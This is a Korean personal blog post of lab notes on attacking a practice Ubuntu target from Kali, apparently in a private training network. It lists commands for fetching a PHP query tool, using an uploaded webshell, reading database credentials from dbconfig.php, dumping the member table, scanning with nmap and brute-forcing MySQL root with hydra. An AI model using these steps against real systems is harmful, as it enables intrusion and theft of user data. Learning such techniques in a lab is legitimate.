Notice
Recent Posts
Recent Comments
Link
«   2024/11   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Tags
more
Archives
Today
Total
관리 메뉴

클라우드 엔지니어 꿈나무

Target Database Hack : SQL 데이터 베이스 회원 정보 확인 - Ubuntu 본문

Linux

Target Database Hack : SQL 데이터 베이스 회원 정보 확인 - Ubuntu

새싹싹이 2023. 10. 12. 10:33

Target Database Hack

SQL 데이터 베이스 회원 정보 확인

 

kali

cmd

# wget https://github.com/github2ygl/safehack/raw/main/myquery.php

firefox

https://10.0.2.11/board/pds/webshell.php

# ls ../

# cat ../dbconfig.php => view page source code

cmd 

# nano myquery.php

하기와 같이 host ~ passwd 까지 입력 값 기입

# cp myquery.php myq.php => firefox 게시판에 페이지가 중복이 되지 않도록 파일 복사

show databases;

use webhack;

show tables;

 

select * from member

Target Database Port Hack

# nmap -sV 10.0.2.11 => port 확장 여부 및 관련 내용 확인

# hydra -l root -P ~/password.txt -v -V 10.0.2.11 mysql => hydra 공격

Ubuntu

저작자표시 비영리 변경금지

'Linux' 카테고리의 다른 글

Redhat RH-134 : 시간 변경 + tar 아카이브 + RSYNC  (1) 2023.10.17
Redhat RH-134 : 인용 특수 문자 + BASH 스크립트 + for문  (1) 2023.10.16
보안 설정 Ubuntu 및 Kali  (2) 2023.10.10
Ubuntu 및 Kali 설치 및 세팅 - Ubuntu  (0) 2023.10.10
RHCSA 기출 : Network 설정 및 계정명 변경 - Centos7  (0) 2023.10.06
'Linux' Related Articles more